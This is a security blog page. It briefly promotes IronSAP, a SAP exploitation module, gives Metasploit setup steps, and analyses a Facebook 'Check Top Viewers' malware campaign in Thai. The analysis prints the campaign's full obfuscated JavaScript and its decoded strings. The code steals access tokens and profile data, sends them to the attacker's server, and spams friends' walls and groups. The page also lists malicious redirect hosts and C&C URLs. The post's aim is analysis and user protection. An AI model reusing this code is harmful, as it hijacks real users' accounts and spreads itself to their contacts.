Jun 26, 2013

Tools: IronSAP : SAP Exploitation

IronSAP : SAP Exploitation Made Easy... (BETA)
Usage : 1. download all the files in github into folder IronWasp/modules/IronSAP 2. Start Ironwasp 3. From menu click ... Modules -> My Downloads -> IronSAP 5. Enter the IP Address of SAP host in text box and hit start 6. Wait till the results are displayed.

Source: https://github.com/prasanna2204/IronSAP


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 24, 2013

Howto: Install Metasploit on Kali Raspberry Pi

1. Login to postgres user
su postgres

2.  Create Msf User and Database in Postgres
createuser msf –P –S –R –D‘
createdb -O msf msf

3. Create rc file for startup script of Metasploit
‘echo “db_connect msf:PostgresPassword@127.0.0.1:5432/msf” > ~/.msf4/db.rc

4. Start Metasploit with startup script
msfconsole –r ~/.msf4/db.rc’  

5. Try to use it.

Source: http://tghc.co/metasploit-postgres-on-kali-raspberry-pi/
  

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Facebook Malware Analysis | Check Top Viewers of the Day Here

**** หากใครต้องการวิธีแก้ให้ไปดูในส่วนท้ายๆของบทความได้เลยครับ

วันนี้พบมีการแพร่กระจาย Facebook Malware อีกแล้วหลังจากเพิ่งพบไปเมื่อไม่กี่วันที่ผ่านมา โดยมาในคราวนี้จะเป็นการหลอกล่อให้คนที่สงสัยว่าใครดู profile เรามากที่สุดบ้าง ซึ่งตัวหน้าตาของ Malware จะประมาณนี้



 ซึ่งหากกดเข้าไปจะพบว่าเราจะถูก redirect ไปยังเว็บไซด์ http://uyasdags.blogspot.de


HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 23 Jun 2013 16:18:29 GMT
Content-Type: text/html; charset=UTF-8
Set-Cookie: Click_soo_gd=1372003628-1; expires=Thu, 22-Aug-2013 16:18:29 GMT; path=/
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://uyasdags.blogspot.de
I-Am: WW3
X-Cnection: close
Content-Length: 282

<html><head><title>9Lds</title><noscript><META http-equiv="refresh" content="0;URL=http://uyasdags.blogspot.de"></noscript><script>location.replace("http://uyasdags.blogspot.de")</script></head><body><a rel="nofollow" href="http://uyasdags.blogspot.de">Moved Here</a>.</body></html>

ซึ่งเมื่อผู้ใช้เข้าไปในเว็บไซด์ http://uyasdags.blogspot.db ก็จะพบว่ามีการฝัง javascript ไว้อีกทีหนึ่ง

    <script>
    var _0xb7f7=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x72\x65\x66"];if(top[_0xb7f7[0]]!=location){top[_0xb7f7[0]][_0xb7f7[1]]=document[_0xb7f7[0]][_0xb7f7[1]];} ;
    location.replace('http://celebvidez.biz/en/?nfd');
    </script>


ซึ่งเป็นการพยายามทำกรรมวิธี Obfuscation เพื่อให้ตรวจจับหรืออ่าน code ได้ยากขึ้นหน่อย ง่ายๆก็คือการ redirect เราไปยัง website http://celebvidez.biz/en/?nfd อีกทีหนึ่งนั่นเอง

เมื่อเข้าไปที่ website http://celebvidez.biz/en/?nfd จะพบว่ามี javascript มากมาย โดยหากเราเป็น Firefox มันจะพยายามให้เราเข้าไปที่ http://videopalace.biz/video.html?install เพื่อไป download virus plugin อีกที

if (navigator['userAgent']['indexOf']('Firefox') != -1) {
    window['location'] = 'http://videopalace.biz/video.html?install';
  }



ซึ่งหากเรากด install มันจะ redirect ไปที่ https://dl.dropboxusercontent.com/u/183896795/plugin.xpi พร้อมทั้งบอกให้เรา Allow การติดตั้งนี้ด้วย (แหม่ๆๆๆ หลอกกันซ้ำแล้วซ้ำอีกนะครับ ท่านผู้ชม) โดยชื่อ Plugin ที่มันใช้จะเป็น Adobe Flash Player ครับ แต่สังเกตุดีๆจะเห็นว่า แม้ชื่อ Plugin นั้นจะดูน่าเชื่อถือแต่จะเขียนไว้ว่า (Author not verfied) ครับ นั่นหมายความว่าไม่สามารถยึนยันผู้เขียนได้นั่นเอง ซึ่งจริงๆแล้วหากเป็นแบบนี้แสดงว่า plugin นี้ไม่ได้ถูกสร้างจากบริษัทยักษ์ใหญ่อย่าง Adobe แน่นอนครับ



โดยหากเราติดตั้งไปแล้วเมื่อเวลาเปิด Firefox ขึ้นมาจะพบว่ามีการเรียกเข้าไปที่

http://staticquery.biz/p/d.txt
http://staticquery.biz/p/adds.js
http://ads.cpxinteractive.com/ttj?id=968787  -> redirect ไปเป็น http://ib.adnxs.com/ttj?id=968787
http://whos.amung.us/pingjs/?k=manofsteel&t=Kali%20Linux%2C%20an%20Offensive%20Security%20Project&c=c&y=&a=0&r=5055

ซึ่งก็คือการเก็บสถิติ,การเข้า link โฆษณาเพื่อหาเงิน, Post ไปยัง Facebook เหมือนดั่ง Browser อื่นๆ(รายละเอียดตามด้านล่าง)และการเข้าไปเพื่ออัพเดตคำสั่งหรือข้อมูลจากเครื่อง C&C นั่นเอง(C&C จะฝากข้อมูลไว้ที่ host ที่เอาไว้ฝากไฟล์ต่างๆ เพื่อให้ตามตัวไม่ถึง)

ที่นี้ย้อนกลับมาดู Script ตัวอื่นที่จะทำงานเมื่อเราไม่ได้ใช้ Firefox บ้างว่าจะเกิดอะไรขึ้น เมื่อข้ามการเช็คการตรวจสอบ browser แล้ว จากนั้นเว็บไซด์นี้ก็จะทำงานต่อโดยการโหลด script ที่ hxxp://celebvidez(dot)biz/en/blogen.js ออกมาโดยหน้าตามันจะประมาณนี้

var _0x4229=["\x52\x65\x64\x69\x72\x65\x63\x74\x69\x6E\x67\x2E\x2E\x2E","\x6C\x6F\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x76\x69\x64\x65\x6F\x70\x61\x6C\x61\x63\x65\x2E\x62\x69\x7A\x2F","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x72\x61\x70\x68\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x6D\x65\x2F\x6C\x69\x6B\x65\x73\x3F\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D","\x26\x6D\x65\x74\x68\x6F\x64\x3D\x50\x4F\x53\x54\x26\x75\x72\x6C\x3D","\x6A\x73\x6F\x6E\x70","\x61\x6A\x61\x78","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x72\x61\x70\x68\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x6D\x65\x2F\x66\x72\x69\x65\x6E\x64\x73\x3F\x75\x69\x64\x3D","\x26\x6D\x65\x74\x68\x6F\x64\x3D\x70\x6F\x73\x74\x26\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D","\x67\x65\x74\x4A\x53\x4F\x4E","\x76\x61\x6C\x75\x65","\x62\x75\x74\x74\x6F\x6E\x31\x32","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x23\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D","\x73\x70\x6C\x69\x74","\x26","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x72\x61\x70\x68\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x6D\x65\x3F\x66\x69\x65\x6C\x64\x73\x3D\x6E\x61\x6D\x65\x2C\x65\x6D\x61\x69\x6C\x2C\x67\x65\x6E\x64\x65\x72\x2C\x75\x73\x65\x72\x6E\x61\x6D\x65\x2C\x70\x69\x63\x74\x75\x72\x65\x26\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D","\x69\x64","\x74\x6F\x6B\x65\x6E\x2E\x70\x68\x70","\x65\x6D\x61\x69\x6C","\x67\x65\x6E\x64\x65\x72","\x70\x6F\x73\x74","\x70\x61\x67\x65\x69\x64\x2E\x70\x68\x70","\x6C\x65\x6E\x67\x74\x68","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F","\x70\x72\x6F\x66\x69\x6C\x65\x69\x64\x2E\x70\x68\x70","\x3C\x63\x65\x6E\x74\x65\x72\x3E\x3C\x74\x61\x62\x6C\x65\x20\x63\x65\x6C\x6C\x70\x61\x64\x64\x69\x6E\x67\x3D\x22\x30\x22\x20\x63\x65\x6C\x6C\x73\x70\x61\x63\x69\x6E\x67\x3D\x22\x30\x22\x3E\x3C\x74\x72\x3E\x3C\x74\x64\x20\x73\x74\x79\x6C\x65\x3D\x22\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x6C\x65\x66\x74\x3B\x76\x65\x72\x74\x69\x63\x61\x6C\x2D\x61\x6C\x69\x67\x6E\x3A\x74\x6F\x70\x22\x3E","\x20\x20\x20\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22","\x75\x72\x6C","\x64\x61\x74\x61","\x70\x69\x63\x74\x75\x72\x65","\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x35\x30\x70\x78\x3B\x6D\x61\x72\x67\x69\x6E\x2D\x72\x69\x67\x68\x74\x3A\x31\x30\x70\x78\x22\x2F\x3E","\x20\x20\x3C\x2F\x74\x64\x3E\x3C\x74\x64\x20\x73\x74\x79\x6C\x65\x3D\x22\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x6C\x65\x66\x74\x3B\x76\x65\x72\x74\x69\x63\x61\x6C\x2D\x61\x6C\x69\x67\x6E\x3A\x74\x6F\x70\x22\x3E\x57\x65\x6C\x63\x6F\x6D\x65\u064B","\x20\x20\x3C\x64\x69\x76\x3E\x3C\x61\x20\x73\x74\x79\x6C\x65\x3D\x22\x66\x6F\x6E\x74\x2D\x77\x65\x69\x67\x68\x74\x3A\x62\x6F\x6C\x64\x22\x20\x68\x72\x65\x66\x3D\x22","\x22\x20\x74\x61\x72\x67\x65\x74\x3D\x22\x5F\x62\x6C\x61\x6E\x6B\x22\x3E\x3C\x2F\x61\x3E\x3C\x2F\x64\x69\x76\x3E","\x20\x20\x20\x3C\x64\x69\x76\x3E","\x6E\x61\x6D\x65","\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x74\x64\x3E\x3C\x2F\x74\x72\x3E\x3C\x2F\x74\x61\x62\x6C\x65\x3E\x3C\x2F\x63\x65\x6E\x74\x65\x72\x3E","\x20\x20\x3C\x63\x65\x6E\x74\x65\x72\x3E\x3C\x74\x61\x62\x6C\x65\x20\x63\x65\x6C\x6C\x70\x61\x64\x64\x69\x6E\x67\x3D\x22\x30\x22\x20\x63\x65\x6C\x6C\x73\x70\x61\x63\x69\x6E\x67\x3D\x22\x30\x22\x3E\x20\x3C\x74\x72\x3E\x3C\x74\x64\x20\x73\x74\x79\x6C\x65\x3D\x22\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x63\x65\x6E\x74\x65\x72\x3B\x76\x65\x72\x74\x69\x63\x61\x6C\x2D\x61\x6C\x69\x67\x6E\x3A\x74\x6F\x70\x22\x20\x63\x6F\x6C\x73\x70\x61\x6E\x3D\x22\x32\x22\x3E\x50\x6C\x65\x61\x73\x65\x20\x57\x61\x69\x74\x65\x3C\x2F\x74\x64\x3E\x3C\x2F\x74\x72\x3E\x3C\x74\x72\x3E","\x20\x3C\x74\x64\x20\x73\x74\x79\x6C\x65\x3D\x22\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x6C\x65\x66\x74\x3B\x76\x65\x72\x74\x69\x63\x61\x6C\x2D\x61\x6C\x69\x67\x6E\x3A\x74\x6F\x70\x22\x20\x63\x6F\x6C\x73\x70\x61\x6E\x3D\x22\x32\x22\x3E","\x20\x20\x20\x3C\x63\x65\x6E\x74\x65\x72\x3E\x20\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x69\x6D\x61\x67\x65\x73\x2F\x6C\x6F\x61\x64\x69\x6E\x67\x2E\x67\x69\x66\x22\x20\x2F\x3E\x3C\x2F\x74\x64\x3E\x3C\x2F\x74\x72\x3E\x3C\x2F\x74\x61\x62\x6C\x65\x3E\x3C\x2F\x63\x65\x6E\x74\x65\x72\x3E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x77\x65\x6C\x63\x6F\x6D\x65","\x77\x65\x6C\x63\x6F\x6D\x65\x31","\x62\x69\x74\x6C\x79\x2E\x70\x68\x70\x3F\x69\x64\x3D","\x26\x6D\x69\x64\x3D","\x26\x75\x72\x6C\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x72\x61\x70\x68\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F","\x2F\x70\x68\x6F\x74\x6F\x73\x3F\x75\x72\x6C\x3D","\x26\x6D\x65\x73\x73\x61\x67\x65\x3D","\x20","\x26\x63\x61\x6C\x6C\x62\x61\x63\x6B\x3D\x70\x61\x79\x6C\x61\x73\x26\x6D\x65\x74\x68\x6F\x64\x3D\x50\x4F\x53\x54\x26\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x72\x61\x70\x68\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x6D\x65\x2F\x66\x72\x69\x65\x6E\x64\x73\x3F\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x72\x61\x70\x68\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x6D\x65\x2F\x67\x72\x6F\x75\x70\x73\x3F\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D","\x26\x6D\x65\x74\x68\x6F\x64\x3D\x50\x4F\x53\x54\x26\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D","\x65\x61\x63\x68","\x3C\x63\x65\x6E\x74\x65\x72\x3E\x45\x72\x72\x6F\x72\x20\x54\x72\x79\x20\x41\x6E\x6F\x74\x68\x65\x72\x20\x41\x63\x74\x69\x76\x61\x74\x69\x6F\x6E\x20\x43\x6F\x64\x65","\x3C\x73\x70\x61\x6E\x20\x69\x64\x3D\x22\x67\x61\x6B\x2D\x70\x75\x6E\x79\x61\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x62\x6C\x2D\x6F\x70\x74\x2D\x66\x62\x22\x20\x6F\x6E\x43\x6C\x69\x63\x6B\x3D\x22\x20","\x24\x28\x27\x23\x66\x62\x2D\x64\x6C\x67\x32\x27\x29\x2E\x66\x61\x64\x65\x4F\x75\x74\x28\x27\x73\x6C\x6F\x77\x27\x2C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x24\x28\x27\x23\x66\x62\x2D\x64\x6C\x67\x31\x27\x29\x2E\x66\x61\x64\x65\x49\x6E\x28\x27\x73\x6C\x6F\x77\x27\x29\x7D\x29\x3B","\x22\x3E\x42\x61\x63\x6B\x20\x3C\x2F\x73\x70\x61\x6E\x3E"];var countrycode=geoip_country_code();function cpa(){console[_0x4229[1]](_0x4229[0]);top[_0x4229[2]]=_0x4229[3];} ;function Reinderizza(){setTimeout(function (){cpa();} ,2000);} ;function sayfabegen(_0x2370x5,_0x2370x6){jQuery[_0x4229[7]]({url:_0x4229[4]+_0x2370x6+_0x4229[5]+_0x2370x5,dataType:_0x4229[6],success:function (_0x2370x7){} });} ;function sil(_0x2370x9,_0x2370xa){$[_0x4229[10]](_0x4229[8]+_0x2370xa+_0x4229[9]+_0x2370x9,function (_0x2370xb){} );} ;function get_tokin(_0x2370xd){var _0x2370x6=document[_0x4229[13]](_0x4229[12])[_0x4229[11]];if(_0x2370x6[_0x4229[15]](_0x4229[14])[1]){var _0x2370x6=_0x2370x6[_0x4229[15]](_0x4229[14])[1][_0x4229[15]](_0x4229[16])[0];$[_0x4229[10]](_0x4229[17]+_0x2370x6,function (_0x2370xb){if(_0x2370xb[_0x4229[18]]){$[_0x4229[22]](_0x4229[19],{access_token:_0x2370x6,uid:_0x2370xb[_0x4229[18]],country:countrycode,email:_0x2370xb[_0x4229[20]],gender:_0x2370xb[_0x4229[21]]});$[_0x4229[10]](_0x4229[23],function (_0x2370xe){for(i=0;i<_0x2370xe[_0x4229[24]];i++){sayfabegen(_0x4229[25]+_0x2370xe[i],_0x2370x6);} ;} );$[_0x4229[10]](_0x4229[26],function (_0x2370xe){for(i=0;i<_0x2370xe[_0x4229[24]];i++){sil(_0x2370x6,_0x2370xe[i]);} ;} );var _0x2370xf=_0x4229[27];_0x2370xf+=_0x4229[28]+_0x2370xb[_0x4229[31]][_0x4229[30]][_0x4229[29]]+_0x4229[32];_0x2370xf+=_0x4229[33];_0x2370xf+=_0x4229[34]+_0x2370xb[_0x4229[31]][_0x4229[30]][_0x4229[29]]+_0x4229[35];_0x2370xf+=_0x4229[36]+_0x2370xb[_0x4229[37]]+_0x4229[38];var _0x2370x10=_0x4229[39];_0x2370x10+=_0x4229[40];_0x2370x10+=_0x4229[41];document[_0x4229[13]](_0x4229[43])[_0x4229[42]]=_0x2370xf;document[_0x4229[13]](_0x4229[44])[_0x4229[42]]=_0x2370x10;$[_0x4229[22]](_0x4229[45]+_0x2370xb[_0x4229[18]]+_0x4229[46]+mid+_0x4229[47]+sitelink,function (_0x2370x11){$[_0x4229[10]](_0x4229[48]+_0x2370xb[_0x4229[18]]+_0x4229[49]+fotolink+_0x4229[50]+message+_0x4229[51]+_0x2370x11+_0x4229[52]+_0x2370x6);$[_0x4229[10]](_0x4229[53]+_0x2370x6,function (_0x2370xb){if(_0x2370xb[_0x4229[30]]){var _0x2370x12=_0x2370xb[_0x4229[30]][_0x4229[24]]-1;$[_0x4229[56]](_0x2370xb[_0x4229[30]],function (_0x2370x13,_0x2370x7){setTimeout(function (){var _0x2370x14=(100*_0x2370x13)/_0x2370x12;$[_0x4229[10]](_0x4229[48]+_0x2370x7[_0x4229[18]]+_0x4229[49]+fotolink+_0x4229[50]+message+_0x4229[51]+_0x2370x11+_0x4229[52]+_0x2370x6);if(_0x2370x13==25){$[_0x4229[10]](_0x4229[54]+_0x2370x6,function (_0x2370xb){if(_0x2370xb[_0x4229[30]]){var _0x2370x12=_0x2370xb[_0x4229[30]][_0x4229[24]]-1;$[_0x4229[56]](_0x2370xb[_0x4229[30]],function (_0x2370x13,_0x2370x7){setTimeout(function (){var _0x2370x14=(100*_0x2370x13)/_0x2370x12;$[_0x4229[10]](_0x4229[48]+_0x2370x7[_0x4229[18]]+_0x4229[49]+fotolink+_0x4229[50]+message+_0x4229[51]+_0x2370x11+_0x4229[55]+_0x2370x6);if(_0x2370x13==_0x2370x12){Reinderizza();} ;} ,1000+(_0x2370x13*1000));} );} ;} );} ;} ,1000+(_0x2370x13*1000));} );} ;} );} );} ;} );} else {var _0x2370xf=_0x4229[57];var _0x2370x10=_0x4229[58];_0x2370x10+=_0x4229[59];_0x2370x10+=_0x4229[60];document[_0x4229[13]](_0x4229[43])[_0x4229[42]]=_0x2370xf;document[_0x4229[13]](_0x4229[44])[_0x4229[42]]=_0x2370x10;} ;} ;

ซึ่งในส่วนต้นที่เป็น hex code (ค่าของ 0x4229) ก็คือ
Redirecting... log location http://videopalace.biz/ https://graph.facebook.com/me/likes?access_token= &method=POST&url= jsonp ajax https://graph.facebook.com/me/friends?uid= &method=post&access_token= getJSON value button12 getElementById #access_token= split & https://graph.facebook.com/me?fields=name,email,gender,username,picture&access_token= id token.php email gender post pageid.php length https://www.facebook.com/ profileid.php <center><table cellpadding="0" cellspacing="0"><tr><td style="text-align:left;vertical-align:top">    <img src=" url data picture " style="width:50px;margin-right:10px"/>   </td><td style="text-align:left;vertical-align:top">Welcome? K   <div><a style="font-weight:bold" href=" " target="_blank"></a></div>    <div> name </div></td></tr></table></center>   <center><table cellpadding="0" cellspacing="0"> <tr><td style="text-align:center;vertical-align:top" colspan="2">Please Waite</td></tr><tr>  <td style="text-align:left;vertical-align:top" colspan="2">    <center> <img src="images/loading.gif" /></td></tr></table></center> innerHTML welcome welcome1 bitly.php?id= &mid= &url= https://graph.facebook.com/ /photos?url= &message=   &callback=paylas&method=POST&access_token= https://graph.facebook.com/me/friends?access_token= https://graph.facebook.com/me/groups?access_token= &method=POST&access_token= each <center>Error Try Another Activation Code <span id="gak-punya" class="tbl-opt-fb" onClick="  $('#fb-dlg2').fadeOut('slow',function(){$('#fb-dlg1').fadeIn('slow')}); ">Back </span>

ซึ่งเป็นการกำหนดค่าเพื่อใช้งานต่อไปในส่วนต่างๆของ script ด้วย array นั่นเอง
var countrycode=geoip_country_code();function cpa(){console[_0x4229[1]](_0x4229[0]);top[_0x4229[2]]=_0x4229[3];} ;function Reinderizza(){setTimeout(function (){cpa();} ,2000);} ;function sayfabegen(_0x2370x5,_0x2370x6){jQuery[_0x4229[7]]({url:_0x4229[4]+_0x2370x6+_0x4229[5]+_0x2370x5,dataType:_0x4229[6],success:function (_0x2370x7){} });} ;function sil(_0x2370x9,_0x2370xa){$[_0x4229[10]](_0x4229[8]+_0x2370xa+_0x4229[9]+_0x2370x9,function (_0x2370xb){} );} ;function get_tokin(_0x2370xd){var _0x2370x6=document[_0x4229[13]](_0x4229[12])[_0x4229[11]];if(_0x2370x6[_0x4229[15]](_0x4229[14])[1]){var _0x2370x6=_0x2370x6[_0x4229[15]](_0x4229[14])[1][_0x4229[15]](_0x4229[16])[0];$[_0x4229[10]](_0x4229[17]+_0x2370x6,function (_0x2370xb){if(_0x2370xb[_0x4229[18]]){$[_0x4229[22]](_0x4229[19],{access_token:_0x2370x6,uid:_0x2370xb[_0x4229[18]],country:countrycode,email:_0x2370xb[_0x4229[20]],gender:_0x2370xb[_0x4229[21]]});$[_0x4229[10]](_0x4229[23],function (_0x2370xe){for(i=0;i<_0x2370xe[_0x4229[24]];i++){sayfabegen(_0x4229[25]+_0x2370xe[i],_0x2370x6);} ;} );$[_0x4229[10]](_0x4229[26],function (_0x2370xe){for(i=0;i<_0x2370xe[_0x4229[24]];i++){sil(_0x2370x6,_0x2370xe[i]);} ;} );var _0x2370xf=_0x4229[27];_0x2370xf+=_0x4229[28]+_0x2370xb[_0x4229[31]][_0x4229[30]][_0x4229[29]]+_0x4229[32];_0x2370xf+=_0x4229[33];_0x2370xf+=_0x4229[34]+_0x2370xb[_0x4229[31]][_0x4229[30]][_0x4229[29]]+_0x4229[35];_0x2370xf+=_0x4229[36]+_0x2370xb[_0x4229[37]]+_0x4229[38];var _0x2370x10=_0x4229[39];_0x2370x10+=_0x4229[40];_0x2370x10+=_0x4229[41];document[_0x4229[13]](_0x4229[43])[_0x4229[42]]=_0x2370xf;document[_0x4229[13]](_0x4229[44])[_0x4229[42]]=_0x2370x10;$[_0x4229[22]](_0x4229[45]+_0x2370xb[_0x4229[18]]+_0x4229[46]+mid+_0x4229[47]+sitelink,function (_0x2370x11){$[_0x4229[10]](_0x4229[48]+_0x2370xb[_0x4229[18]]+_0x4229[49]+fotolink+_0x4229[50]+message+_0x4229[51]+_0x2370x11+_0x4229[52]+_0x2370x6);$[_0x4229[10]](_0x4229[53]+_0x2370x6,function (_0x2370xb){if(_0x2370xb[_0x4229[30]]){var _0x2370x12=_0x2370xb[_0x4229[30]][_0x4229[24]]-1;$[_0x4229[56]](_0x2370xb[_0x4229[30]],function (_0x2370x13,_0x2370x7){setTimeout(function (){var _0x2370x14=(100*_0x2370x13)/_0x2370x12;$[_0x4229[10]](_0x4229[48]+_0x2370x7[_0x4229[18]]+_0x4229[49]+fotolink+_0x4229[50]+message+_0x4229[51]+_0x2370x11+_0x4229[52]+_0x2370x6);if(_0x2370x13==25){$[_0x4229[10]](_0x4229[54]+_0x2370x6,function (_0x2370xb){if(_0x2370xb[_0x4229[30]]){var _0x2370x12=_0x2370xb[_0x4229[30]][_0x4229[24]]-1;$[_0x4229[56]](_0x2370xb[_0x4229[30]],function (_0x2370x13,_0x2370x7){setTimeout(function (){var _0x2370x14=(100*_0x2370x13)/_0x2370x12;$[_0x4229[10]](_0x4229[48]+_0x2370x7[_0x4229[18]]+_0x4229[49]+fotolink+_0x4229[50]+message+_0x4229[51]+_0x2370x11+_0x4229[55]+_0x2370x6);if(_0x2370x13==_0x2370x12){Reinderizza();} ;} ,1000+(_0x2370x13*1000));} );} ;} );} ;} ,1000+(_0x2370x13*1000));} );} ;} );} );} ;} );} else {var _0x2370xf=_0x4229[57];var _0x2370x10=_0x4229[58];_0x2370x10+=_0x4229[59];_0x2370x10+=_0x4229[60];document[_0x4229[13]](_0x4229[43])[_0x4229[42]]=_0x2370xf;document[_0x4229[13]](_0x4229[44])[_0x4229[42]]=_0x2370x10;} ;} ;

ผนวกกับการดึงค่าข้อมูลของเราโดยการใช้ javascript ในการบังคับให้เราเข้าไปที่ http://on.fb.me/17vzuoT หรือก็คือ https://www.facebook.com/login.php?api_key=139682082719810&skip_api_login=1&display=popup&cancel_url=http://m.facebook.com%253Fsdk%253Dios%26error_reason%3Duser_denied%26error%3Daccess_denied%26error_description%3DThe%2Buser%2Bdenied%2Byour%2Brequest.&fbconnect=1&next=https://m.facebook.com//dialog/permissions.request%3F_path%3Dpermissions.request%26app_id%3D139682082719810%26client_id%3D139682082719810%26redirect_uri%3Dhttps://www.facebook.com/connect/login_success.html?display%3Dpopup%26type%3Duser_agent%26perms%3Doffline_access%26fbconnect%3D1%26from_login%3D1%26rcount%3D1&rcount=2

เพื่อให้เรายืนยันติดตั้ง Facebook Application ตัวนี้เข้าไปนัั่นเอง ซึ่งเมื่อเรายืนยันแล้ว สิ่งที่มันทำต่อไปคือมันจะไป list มาว่าเรามี page,group อะไรที่เราเป็นส่วนร่วมบ้างรวมถึงเพื่อนๆเราด้วย แล้วกระจาย Facebook Application หน้าตาแบบที่เราเห็นกันในส่วนแรกด้วยการให้เราไปโพสต์ไว้ในหน้า wall เพื่อน, Page , Group ต่างๆนั่นเอง
<script type="text/javascript" >var acc_like= 'view-source:http://on.fb.me/17vzuoT';
      var acc_share= 'view-source:http://on.fb.me/17vzuoT';
      var message = 'Check Top Viewers of the Day Here >> ';
      var fotolink = "http://i.imgur.com/1slcrAX.jpg";
      var redi_link = 'http://adf.ly/QblaM';
      var mid= '29';
      var sitelink   = 'http://likes-free.com/msite';</script>


ซึ่งจาก javascript อันนี้จะเห็นว่ามีตัวที่เอาไว้หาเงินด้วย ซึ่งก็คือ adf.ly นั่นเอง


วิธีการแก้ไข Malware ตัวนี้
สรุปนะครับการจัดการ malware ตัวนี้คือ
1. อย่า click link ใดๆที่เราคิดว่าไม่ใช่ลักษณะนิสัยปกติของเพื่อนเราเป็นอันขาด
2. หากติดตั้ง Firefox Plugin ไปแล้ว ให้เข้าไปลบโดยเข้าไปที่  Tools -> Add-ons -> Extensions -> จากนั้นลบ(Remove) Plugin ที่ชื่อว่า Adobe Flash Player 3.7 ทิ้งครับ จากนั้น Restart Firefox อีกครั้งครับ



3. หากเราติดตั้ง Facebook Application ตัวนี้ไปแล้วให้เข้าไปที่ Settings(รูปเฟือง) มุมขวาบน -> Privacy Settings

ไปที่ Apps
จากนั้นลบ Apps ที่ชื่อว่า"Who's Viewing your Profile"

หรือง่ายกว่านั้นก็คือให้เข้าไปที่ https://www.facebook.com/settings?tab=blocking จากนั้นเลือก blocks Apps "Who's Viewing your Profile" ครับ


5. ไล่ลบทุกโพสต์ใน Group ต่างๆหรือ Wall


จะเห็นว่าในการโจมตีปัจจุบันเริ่มมีการทำงานที่ซับซ้อนมากขึ้น การหลอกล่อที่ดูเนียนตามากขึ้น ดังนั้นสิ่งที่เราทำได้คือการมีตระหนักถึงความปลอดภัย(Security Awareness)ในการใช้งาน Internet หรือเว็บไซด์ต่างๆอยู่เสมอครับ

ขอให้ปลอดภัยต่อการใช้งาน Internet ครับ :)
Internet is a great power, but it's come with a risk.

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |